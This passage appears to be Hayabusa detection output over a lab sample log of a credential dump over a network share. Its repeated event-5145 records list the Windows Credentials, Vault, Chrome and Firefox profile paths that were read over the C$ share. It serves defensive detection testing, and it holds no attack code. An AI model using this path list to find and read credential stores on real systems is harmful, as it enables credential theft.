0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 